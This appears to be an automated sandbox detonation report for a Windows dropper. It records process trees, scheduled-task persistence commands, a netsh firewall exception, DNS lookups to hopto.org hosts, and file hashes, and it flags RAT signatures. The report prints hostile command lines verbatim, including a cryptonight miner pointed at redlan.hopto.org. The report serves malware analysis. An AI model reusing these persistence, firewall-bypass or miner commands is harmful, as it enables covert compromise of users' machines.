PID 2956 wrote to memory of 2672 N/A C:\Users\Admin\AppData\Local\Temp\018e93f66899228a3e980f8fa671c021_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\cleaner.exe
PID 2956 wrote to memory of 2508 N/A C:\Users\Admin\AppData\Local\Temp\018e93f66899228a3e980f8fa671c021_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\Torrent.exe
PID 2956 wrote to memory of 2508 N/A C:\Users\Admin\AppData\Local\Temp\018e93f66899228a3e980f8fa671c021_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\Torrent.exe
PID 2956 wrote to memory of 2508 N/A C:\Users\Admin\AppData\Local\Temp\018e93f66899228a3e980f8fa671c021_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\Torrent.exe
PID 2956 wrote to memory of 2508 N/A C:\Users\Admin\AppData\Local\Temp\018e93f66899228a3e980f8fa671c021_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\Torrent.exe
PID 2956 wrote to memory of 2636 N/A C:\Users\Admin\AppData\Local\Temp\018e93f66899228a3e980f8fa671c021_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\μTorrent.exe
PID 2956 wrote to memory of 2636 N/A C:\Users\Admin\AppData\Local\Temp\018e93f66899228a3e980f8fa671c021_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\μTorrent.exe
PID 2956 wrote to memory of 2636 N/A C:\Users\Admin\AppData\Local\Temp\018e93f66899228a3e980f8fa671c021_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\μTorrent.exe
PID 2956 wrote to memory of 2636 N/A C:\Users\Admin\AppData\Local\Temp\018e93f66899228a3e980f8fa671c021_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\μTorrent.exe
PID 2672 wrote to memory of 2744 N/A C:\Users\Admin\AppData\Local\Temp\cleaner.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
PID 2672 wrote to memory of 2744 N/A C:\Users\Admin\AppData\Local\Temp\cleaner.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
PID 2672 wrote to memory of 2744 N/A C:\Users\Admin\AppData\Local\Temp\cleaner.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
PID 2672 wrote to memory of 2744 N/A C:\Users\Admin\AppData\Local\Temp\cleaner.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
PID 2672 wrote to memory of 2744 N/A C:\Users\Admin\AppData\Local\Temp\cleaner.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
PID 2672 wrote to memory of 2744 N/A C:\Users\Admin\AppData\Local\Temp\cleaner.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
PID 2672 wrote to memory of 2744 N/A C:\Users\Admin\AppData\Local\Temp\cleaner.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
PID 2672 wrote to memory of 2744 N/A C:\Users\Admin\AppData\Local\Temp\cleaner.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
PID 2672 wrote to memory of 2744 N/A C:\Users\Admin\AppData\Local\Temp\cleaner.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
PID 2956 wrote to memory of 2936 N/A C:\Users\Admin\AppData\Local\Temp\018e93f66899228a3e980f8fa671c021_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\Project1.exe
PID 2956 wrote to memory of 2936 N/A C:\Users\Admin\AppData\Local\Temp\018e93f66899228a3e980f8fa671c021_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\Project1.exe
PID 2956 wrote to memory of 2936 N/A C:\Users\Admin\AppData\Local\Temp\018e93f66899228a3e980f8fa671c021_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\Project1.exe
PID 2956 wrote to memory of 2936 N/A C:\Users\Admin\AppData\Local\Temp\018e93f66899228a3e980f8fa671c021_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\Project1.exe
PID 2672 wrote to memory of 292 N/A C:\Users\Admin\AppData\Local\Temp\cleaner.exe C:\Windows\SysWOW64\schtasks.exe
PID 2672 wrote to memory of 292 N/A C:\Users\Admin\AppData\Local\Temp\cleaner.exe C:\Windows\SysWOW64\schtasks.exe
PID 2672 wrote to memory of 292 N/A C:\Users\Admin\AppData\Local\Temp\cleaner.exe C:\Windows\SysWOW64\schtasks.exe
PID 2672 wrote to memory of 292 N/A C:\Users\Admin\AppData\Local\Temp\cleaner.exe C:\Windows\SysWOW64\schtasks.exe
PID 2956 wrote to memory of 2776 N/A C:\Users\Admin\AppData\Local\Temp\018e93f66899228a3e980f8fa671c021_JaffaCakes118.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 2956 wrote to memory of 2776 N/A C:\Users\Admin\AppData\Local\Temp\018e93f66899228a3e980f8fa671c021_JaffaCakes118.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 2956 wrote to memory of 2776 N/A C:\Users\Admin\AppData\Local\Temp\018e93f66899228a3e980f8fa671c021_JaffaCakes118.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 2956 wrote to memory of 2776 N/A C:\Users\Admin\AppData\Local\Temp\018e93f66899228a3e980f8fa671c021_JaffaCakes118.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 2956 wrote to memory of 2776 N/A C:\Users\Admin\AppData\Local\Temp\018e93f66899228a3e980f8fa671c021_JaffaCakes118.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 2956 wrote to memory of 2776 N/A C:\Users\Admin\AppData\Local\Temp\018e93f66899228a3e980f8fa671c021_JaffaCakes118.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 2956 wrote to memory of 2776 N/A C:\Users\Admin\AppData\Local\Temp\018e93f66899228a3e980f8fa671c021_JaffaCakes118.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 2956 wrote to memory of 2776 N/A C:\Users\Admin\AppData\Local\Temp\018e93f66899228a3e980f8fa671c021_JaffaCakes118.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 2956 wrote to memory of 2776 N/A C:\Users\Admin\AppData\Local\Temp\018e93f66899228a3e980f8fa671c021_JaffaCakes118.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 2956 wrote to memory of 2344 N/A C:\Users\Admin\AppData\Local\Temp\018e93f66899228a3e980f8fa671c021_JaffaCakes118.exe C:\Windows\SysWOW64\schtasks.exe
PID 2956 wrote to memory of 2344 N/A C:\Users\Admin\AppData\Local\Temp\018e93f66899228a3e980f8fa671c021_JaffaCakes118.exe C:\Windows\SysWOW64\schtasks.exe
PID 2956 wrote to memory of 2344 N/A C:\Users\Admin\AppData\Local\Temp\018e93f66899228a3e980f8fa671c021_JaffaCakes118.exe C:\Windows\SysWOW64\schtasks.exe
PID 2956 wrote to memory of 2344 N/A C:\Users\Admin\AppData\Local\Temp\018e93f66899228a3e980f8fa671c021_JaffaCakes118.exe C:\Windows\SysWOW64\schtasks.exe
PID 2636 wrote to memory of 2960 N/A C:\Users\Admin\AppData\Local\Temp\μTorrent.exe C:\Users\Admin\AppData\Local\Temp\NetFramework.exe
PID 2636 wrote to memory of 2960 N/A C:\Users\Admin\AppData\Local\Temp\μTorrent.exe C:\Users\Admin\AppData\Local\Temp\NetFramework.exe
PID 2636 wrote to memory of 2960 N/A C:\Users\Admin\AppData\Local\Temp\μTorrent.exe C:\Users\Admin\AppData\Local\Temp\NetFramework.exe
PID 2508 wrote to memory of 592 N/A C:\Users\Admin\AppData\Local\Temp\Torrent.exe C:\Users\Admin\AppData\Local\Temp\NetFramework.exe
PID 2508 wrote to memory of 592 N/A C:\Users\Admin\AppData\Local\Temp\Torrent.exe C:\Users\Admin\AppData\Local\Temp\NetFramework.exe
PID 2508 wrote to memory of 592 N/A C:\Users\Admin\AppData\Local\Temp\Torrent.exe C:\Users\Admin\AppData\Local\Temp\NetFramework.exe
PID 2776 wrote to memory of 1304 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\SysWOW64\taskmgr.exe
PID 2776 wrote to memory of 1304 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\SysWOW64\taskmgr.exe
PID 2776 wrote to memory of 1304 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\SysWOW64\taskmgr.exe
PID 2776 wrote to memory of 1304 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\SysWOW64\taskmgr.exe
PID 2960 wrote to memory of 1996 N/A C:\Users\Admin\AppData\Local\Temp\NetFramework.exe C:\Windows\explorer.exe
PID 2960 wrote to memory of 1996 N/A C:\Users\Admin\AppData\Local\Temp\NetFramework.exe C:\Windows\explorer.exe
PID 2960 wrote to memory of 1996 N/A C:\Users\Admin\AppData\Local\Temp\NetFramework.exe C:\Windows\explorer.exe
PID 2960 wrote to memory of 1996 N/A C:\Users\Admin\AppData\Local\Temp\NetFramework.exe C:\Windows\explorer.exe
PID 2960 wrote to memory of 1996 N/A C:\Users\Admin\AppData\Local\Temp\NetFramework.exe C:\Windows\explorer.exe
PID 2960 wrote to memory of 1996 N/A C:\Users\Admin\AppData\Local\Temp\NetFramework.exe C:\Windows\explorer.exe
PID 2960 wrote to memory of 1996 N/A C:\Users\Admin\AppData\Local\Temp\NetFramework.exe C:\Windows\explorer.exe
PID 592 wrote to memory of 2600 N/A C:\Users\Admin\AppData\Local\Temp\NetFramework.exe C:\Windows\explorer.exe

Processes

C:\Users\Admin\AppData\Local\Temp\018e93f66899228a3e980f8fa671c021_JaffaCakes118.exe

"C:\Users\Admin\AppData\Local\Temp\018e93f66899228a3e980f8fa671c021_JaffaCakes118.exe"

C:\Users\Admin\AppData\Local\Temp\Ccleaner.exe

"C:\Users\Admin\AppData\Local\Temp\Ccleaner.exe"

C:\Users\Admin\AppData\Local\Temp\cleaner.exe

"C:\Users\Admin\AppData\Local\Temp\cleaner.exe"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe"

C:\Users\Admin\AppData\Local\Temp\Torrent.exe

"C:\Users\Admin\AppData\Local\Temp\Torrent.exe"

C:\Users\Admin\AppData\Local\Temp\μTorrent.exe

"C:\Users\Admin\AppData\Local\Temp\μTorrent.exe"

C:\Users\Admin\AppData\Local\Temp\Project1.exe

"C:\Users\Admin\AppData\Local\Temp\Project1.exe"

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\SysWOW64\schtasks.exe" /create /tn SettingSyncHost /tr "C:\Users\Admin\secinit\sdchange.exe" /sc minute /mo 1 /F

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\SysWOW64\schtasks.exe" /create /tn ApplicationFrameHost /tr "C:\Users\Admin\AppData\Roaming\browserbroker\djoin.exe" /sc minute /mo 1 /F

C:\Users\Admin\AppData\Local\Temp\NetFramework.exe

"C:\Users\Admin\AppData\Local\Temp\NetFramework.exe"

C:\Users\Admin\AppData\Local\Temp\NetFramework.exe

"C:\Users\Admin\AppData\Local\Temp\NetFramework.exe"

C:\Windows\SysWOW64\taskmgr.exe

"C:\Windows\System32\taskmgr.exe"

C:\Windows\explorer.exe

C:\Windows\explorer.exe -a cryptonight --url=redlan.hopto.org:3333 -p #PWD -R --variant=-1 -u GuyFlawkesMinerAdmin -k -t 4 --max-cpu-usage=50

C:\Windows\explorer.exe

C:\Windows\explorer.exe -a cryptonight --url=redlan.hopto.org:3333 -p #PWD -R --variant=-1 -u GuyFlawkesMinerAdmin -k -t 4 --max-cpu-usage=50

C:\Windows\system32\wbem\WmiApSrv.exe

C:\Windows\system32\wbem\WmiApSrv.exe

C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe"

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\SysWOW64\schtasks.exe" /create /tn backgroundTaskHost /tr "C:\Users\Admin\AppData\Local\Temp\RdpSaUacHelper\data.exe" /sc minute /mo 1 /F

C:\Windows\SysWOW64\netsh.exe

netsh firewall add allowedprogram "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe" "RegAsm.exe" ENABLE

C:\Windows\system32\taskeng.exe

taskeng.exe {6B93570C-C3B1-4C28-810E-C9A55839F459} S-1-5-21-481678230-3773327859-3495911762-1000:UIBNQNMA\Admin:Interactive:[1]

C:\Users\Admin\AppData\Local\Temp\RdpSaUacHelper\data.exe

C:\Users\Admin\AppData\Local\Temp\RdpSaUacHelper\data.exe

C:\Users\Admin\AppData\Roaming\browserbroker\djoin.exe

C:\Users\Admin\AppData\Roaming\browserbroker\djoin.exe

C:\Users\Admin\secinit\sdchange.exe

C:\Users\Admin\secinit\sdchange.exe

C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe"

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\SysWOW64\schtasks.exe" /create /tn SettingSyncHost /tr "C:\Users\Admin\secinit\sdchange.exe" /sc minute /mo 1 /F

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\SysWOW64\schtasks.exe" /create /tn ApplicationFrameHost /tr "C:\Users\Admin\AppData\Roaming\browserbroker\djoin.exe" /sc minute /mo 1 /F

C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe"

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\SysWOW64\schtasks.exe" /create /tn backgroundTaskHost /tr "C:\Users\Admin\AppData\Local\Temp\RdpSaUacHelper\data.exe" /sc minute /mo 1 /F

C:\Users\Admin\AppData\Local\Temp\RdpSaUacHelper\data.exe

C:\Users\Admin\AppData\Local\Temp\RdpSaUacHelper\data.exe

C:\Users\Admin\AppData\Roaming\browserbroker\djoin.exe

C:\Users\Admin\AppData\Roaming\browserbroker\djoin.exe

C:\Users\Admin\secinit\sdchange.exe

C:\Users\Admin\secinit\sdchange.exe

C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe"

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\SysWOW64\schtasks.exe" /create /tn SettingSyncHost /tr "C:\Users\Admin\secinit\sdchange.exe" /sc minute /mo 1 /F

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\SysWOW64\schtasks.exe" /create /tn ApplicationFrameHost /tr "C:\Users\Admin\AppData\Roaming\browserbroker\djoin.exe" /sc minute /mo 1 /F

Network

Country Destination Domain Proto
US 8.8.8.8:53 api.ipify.org udp
US 8.8.8.8:53 nandos.hopto.org udp
US 8.8.8.8:53 redlan.hopto.org udp
US 8.8.8.8:53 redlan.hopto.org udp
US 8.8.8.8:53 nandos.hopto.org udp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 nandos.hopto.org udp
US 8.8.8.8:53 nandos.hopto.org udp
US 8.8.8.8:53 nandos.hopto.org udp
US 8.8.8.8:53 redlan.hopto.org udp
US 8.8.8.8:53 redlan.hopto.org udp
US 8.8.8.8:53 nandos.hopto.org udp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 nandos.hopto.org udp
US 8.8.8.8:53 nandos.hopto.org udp
US 8.8.8.8:53 nandos.hopto.org udp
US 8.8.8.8:53 redlan.hopto.org udp
US 8.8.8.8:53 redlan.hopto.org udp
US 8.8.8.8:53 nandos.hopto.org udp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 nandos.hopto.org udp
US 8.8.8.8:53 nandos.hopto.org udp
US 8.8.8.8:53 redlan.hopto.org udp
US 8.8.8.8:53 redlan.hopto.org udp
US 8.8.8.8:53 nandos.hopto.org udp
US 8.8.8.8:53 redlan.hopto.org udp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 nandos.hopto.org udp
US 8.8.8.8:53 nandos.hopto.org udp
US 8.8.8.8:53 redlan.hopto.org udp
US 8.8.8.8:53 nandos.hopto.org udp
US 8.8.8.8:53 redlan.hopto.org udp
US 8.8.8.8:53 redlan.hopto.org udp
US 8.8.8.8:53 nandos.hopto.org udp
US 8.8.8.8:53 nandos.hopto.org udp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 redlan.hopto.org udp
US 8.8.8.8:53 nandos.hopto.org udp
US 8.8.8.8:53 nandos.hopto.org udp
US 8.8.8.8:53 redlan.hopto.org udp
US 8.8.8.8:53 redlan.hopto.org udp
US 8.8.8.8:53 nandos.hopto.org udp
US 8.8.8.8:53 redlan.hopto.org udp
US 8.8.8.8:53 nandos.hopto.org udp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 nandos.hopto.org udp
US 8.8.8.8:53 nandos.hopto.org udp
US 8.8.8.8:53 redlan.hopto.org udp
US 8.8.8.8:53 redlan.hopto.org udp
US 8.8.8.8:53 redlan.hopto.org udp
US 8.8.8.8:53 nandos.hopto.org udp
US 8.8.8.8:53 nandos.hopto.org udp
US 8.8.8.8:53 nandos.hopto.org udp
US 8.8.8.8:53 redlan.hopto.org udp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 nandos.hopto.org udp
US 8.8.8.8:53 redlan.hopto.org udp
US 8.8.8.8:53 redlan.hopto.org udp
US 8.8.8.8:53 nandos.hopto.org udp
US 8.8.8.8:53 nandos.hopto.org udp
US 8.8.8.8:53 redlan.hopto.org udp
US 8.8.8.8:53 nandos.hopto.org udp

Files

\Users\Admin\AppData\Local\Temp\Ccleaner.exe

MD5 d18ce77a75017e627de41febd9e289ee
SHA1 012a66d318e8294492accc0beca42c9999b68146
SHA256 7d6e025a8d510b10988375f020c60efec7d6ee77367ed8879e8a3b1172a5efd4
SHA512 c5f24a7f7c9e8ed552aa6402539171551851afd86b85b28e4018c2c8cd38c4ed22cb726eec5f750d90a25343e61e1cc97c62b1a486cbac6e04b777886411c86f

C:\Users\Admin\AppData\Local\Temp\Project1.exe

MD5 1166591fc5f77c463d176bcca574efff
SHA1 35d710b8983945aaf8c39d289fd6c73ed1f00b65
SHA256 a51c6e6c19be022dcbf235a9bebeab1b73292e2ee40b48653e80b96f10aa9bad
SHA512 751f5cf2cc5316ddbbba2805ac9c3fee24d80a85c92587c85ac80a2033aaeef96f58bcb5053584bcea7ad8fcb538183da9d29360f44666e1bfd3bdf0f08caa97

memory/2936-78-0x00000000023F0000-0x0000000002530000-memory.dmp

memory/2936-81-0x00000000023F0000-0x0000000002530000-memory.dmp

memory/2936-88-0x0000000002950000-0x0000000002951000-memory.dmp

memory/2936-96-0x00000000023F0000-0x0000000002530000-memory.dmp

memory/2936-124-0x0000000002E50000-0x0000000002E51000-memory.dmp

memory/2936-123-0x00000000023F0000-0x0000000002530000-memory.dmp

memory/2636-133-0x0000000000360000-0x0000000000A46000-memory.dmp

memory/2508-134-0x0000000001180000-0x0000000001866000-memory.dmp

memory/2936-122-0x00000000023F0000-0x0000000002530000-memory.dmp

memory/2936-121-0x0000000002E40000-0x0000000002E41000-memory.dmp

memory/2936-120-0x00000000023F0000-0x0000000002530000-memory.dmp

memory/2936-119-0x00000000023F0000-0x0000000002530000-memory.dmp

memory/2936-118-0x0000000002E30000-0x0000000002E31000-memory.dmp

memory/2936-117-0x00000000023F0000-0x0000000002530000-memory.dmp

memory/2936-116-0x00000000023F0000-0x0000000002530000-memory.dmp

memory/2936-115-0x00000000029E0000-0x00000000029E1000-memory.dmp

memory/2936-114-0x00000000023F0000-0x0000000002530000-memory.dmp

memory/2936-113-0x00000000023F0000-0x0000000002530000-memory.dmp

memory/2936-112-0x00000000029D0000-0x00000000029D1000-memory.dmp

memory/2936-111-0x00000000023F0000-0x0000000002530000-memory.dmp

memory/2936-110-0x00000000023F0000-0x0000000002530000-memory.dmp

memory/2936-109-0x00000000029C0000-0x00000000029C1000-memory.dmp

memory/2936-108-0x00000000023F0000-0x0000000002530000-memory.dmp

memory/2936-107-0x00000000023F0000-0x0000000002530000-memory.dmp

memory/2936-106-0x00000000029B0000-0x00000000029B1000-memory.dmp

memory/2936-105-0x00000000023F0000-0x0000000002530000-memory.dmp

memory/2936-104-0x00000000023F0000-0x0000000002530000-memory.dmp

memory/2936-103-0x00000000029A0000-0x00000000029A1000-memory.dmp

memory/2936-102-0x00000000023F0000-0x0000000002530000-memory.dmp

memory/2936-101-0x00000000023F0000-0x0000000002530000-memory.dmp

memory/2936-100-0x0000000002990000-0x0000000002991000-memory.dmp

memory/2936-99-0x00000000023F0000-0x0000000002530000-memory.dmp

memory/2936-98-0x00000000023F0000-0x0000000002530000-memory.dmp

memory/2936-97-0x0000000002980000-0x0000000002981000-memory.dmp

memory/2936-95-0x00000000023F0000-0x0000000002530000-memory.dmp

memory/2936-94-0x0000000002970000-0x0000000002971000-memory.dmp

memory/2936-93-0x00000000023F0000-0x0000000002530000-memory.dmp

memory/2936-92-0x00000000023F0000-0x0000000002530000-memory.dmp

memory/2936-91-0x0000000002960000-0x0000000002961000-memory.dmp

memory/2936-90-0x00000000023F0000-0x0000000002530000-memory.dmp

memory/2936-89-0x00000000023F0000-0x0000000002530000-memory.dmp

memory/2936-87-0x00000000023F0000-0x0000000002530000-memory.dmp

memory/2936-86-0x00000000023F0000-0x0000000002530000-memory.dmp

memory/2936-85-0x0000000002940000-0x0000000002941000-memory.dmp

memory/2936-84-0x00000000023F0000-0x0000000002530000-memory.dmp

memory/2936-83-0x00000000023F0000-0x0000000002530000-memory.dmp

memory/2936-82-0x0000000002930000-0x0000000002931000-memory.dmp

memory/2936-80-0x00000000023F0000-0x0000000002530000-memory.dmp

memory/2936-79-0x0000000002920000-0x0000000002921000-memory.dmp

memory/2936-77-0x00000000023F0000-0x0000000002530000-memory.dmp

memory/2936-76-0x0000000002910000-0x0000000002911000-memory.dmp

memory/2936-75-0x00000000023F0000-0x0000000002530000-memory.dmp

memory/2936-74-0x00000000023F0000-0x0000000002530000-memory.dmp

memory/2936-73-0x0000000002900000-0x0000000002901000-memory.dmp

memory/2936-72-0x00000000023F0000-0x0000000002530000-memory.dmp

memory/2936-71-0x00000000023F0000-0x0000000002530000-memory.dmp

memory/2936-70-0x0000000000D10000-0x0000000000D11000-memory.dmp

memory/2744-54-0x0000000000090000-0x000000000009C000-memory.dmp

memory/2744-53-0x0000000000090000-0x000000000009C000-memory.dmp

memory/2744-51-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

memory/2744-48-0x0000000000090000-0x000000000009C000-memory.dmp

memory/2744-46-0x0000000000090000-0x000000000009C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\μTorrent.exe

MD5 7e962cb55be5963163d4f6a21100950c
SHA1 f58ad41f8c86b9cffc7d66f4991162f731926d1d
SHA256 1e6af101af20d01594ae2d42d066198b7e226546e6cd9f37594783618e758968
SHA512 757996c16752816850607d4ef1cb12e002133c73a2c431ef735aa56f01bf33a6ea4e2725556e2a53a4603552348477fa72c286afdf1fd605ea5f8671b2486b3a

C:\Users\Admin\AppData\Local\Temp\Torrent.exe

MD5 cedb1319e9cbd45f4cc69e58699009d3
SHA1 ef66c3f343744a6afa9b9955d65e6ccaba41c27e
SHA256 5f61384bf58773755f2ae7500b1e24b1394df6b69c80d240ad0731842c908808
SHA512 bb204c60f138e4a341a6eafed2b39409105805e391bea572e5df0d8f0a24e5af8e2d2da9fedb26460adef321079efbe8443fa08bb0e0b3702e6478452bb26bd8

memory/2672-29-0x0000000000290000-0x0000000000291000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\cleaner.exe

MD5 b4bae96dc11834b254ec53b2cdba13aa
SHA1 7b67438093eb1860237bf88aefebf56bb9333aba
SHA256 bcd5d4c36ee50d99d6ae1aa91c0c12569f711d37e7b59a3483f413c7c2b68142
SHA512 ea2b93b7f9046e931812ab8efd364502d936ad28fa174f1c63d79fa46bedc5bbbf3476c0b551e40ae75bf82cbb3c5a107e41b49aeb6cd0b5fc294a5813519eda

memory/2776-145-0x0000000000400000-0x0000000000456000-memory.dmp

memory/2776-146-0x0000000000200000-0x0000000000210000-memory.dmp

memory/2776-147-0x00000000048F0000-0x000000000499E000-memory.dmp

memory/2776-149-0x0000000000220000-0x0000000000248000-memory.dmp

memory/2960-161-0x0000000001320000-0x0000000001A06000-memory.dmp

memory/2776-162-0x00000000009F0000-0x0000000000A06000-memory.dmp

memory/2960-174-0x0000000000B50000-0x0000000000B58000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\RdpSaUacHelper\data.exe

MD5 c8ef1b359a5585af85da2cc6d32d44af
SHA1 2da8ede6a4292d8ac9ff26c7ebc07095cb873432
SHA256 6ca5985e0483ad3299993e6b659d441928fdbb7f5a12f65f4fc01ee65ac1a1d3
SHA512 b8a7b1e0ea23fb3ca89d17f82174e728108e16b051217798a8222130238f6938e6eab8858d023346a2690b11e16082364594d36055db7f6daa72dbbcc8d91c26

C:\Users\Admin\AppData\Roaming\browserbroker\djoin.exe

MD5 9a54e0e62b6e4dc77628a3b0430d864c
SHA1 75de60d227a614f41a81ebe22e3fa5c73084ba71
SHA256 3cf5a8c136aa7316dad6f1cde00ffd70e4aadb7a173faf9dc5f0d24a50d165ab
SHA512 4a2929744eb6d298b5429b54c4dd6fcd6982ac6146e21aec00f53bf9da9a69eca49bd300bd840c8104cf3b815d59c57d68760ab3766cf5f3d45109dc6c3ca5b6

C:\Users\Admin\secinit\sdchange.exe

MD5 0bb36431031d90ee6e3f6d513b953236
SHA1 9e1ad77e5312be3171e296c475cde0cd0c683b8c
SHA256 f33650da611ba00209f97cad15d87900b9942b2802b6a8b44dda43ee0e5fc7bd
SHA512 933c56f433fcca008d59943804df6aeb84a86173172be03ea88e846d5398c70547f733f21dc0a8e159ef0408633fd9450291b91fa59c8f085477be6edc6fecfe

Analysis: behavioral2

Detonation Overview

Submitted

2024-04-26 20:03

Reported

2024-04-26 20:06

Platform

win10v2004-20240419-en

Max time kernel

150s

Max time network

150s

Command Line

"C:\Users\Admin\AppData\Local\Temp\018e93f66899228a3e980f8fa671c021_JaffaCakes118.exe"

Signatures

Imminent RAT

trojan spyware imminent

LimeRAT

rat limerat

njRAT/Bladabindi

trojan njrat

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-877519540-908060166-1852957295-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\cleaner.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-877519540-908060166-1852957295-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Torrent.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-877519540-908060166-1852957295-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Ccleaner.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-877519540-908060166-1852957295-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Roaming\browserbroker\djoin.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-877519540-908060166-1852957295-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\RdpSaUacHelper\data.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-877519540-908060166-1852957295-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\018e93f66899228a3e980f8fa671c021_JaffaCakes118.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-877519540-908060166-1852957295-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\μTorrent.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-877519540-908060166-1852957295-1000\Control Panel\International\Geo\Nation C:\Users\Admin\secinit\sdchange.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-877519540-908060166-1852957295-1000\Control Panel\International\Geo\Nation C:\Users\Admin\secinit\sdchange.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-877519540-908060166-1852957295-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Roaming\browserbroker\djoin.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Ccleaner.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\cleaner.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Torrent.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\μTorrent.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Project1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\NetFramework.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\NetFramework.exe N/A
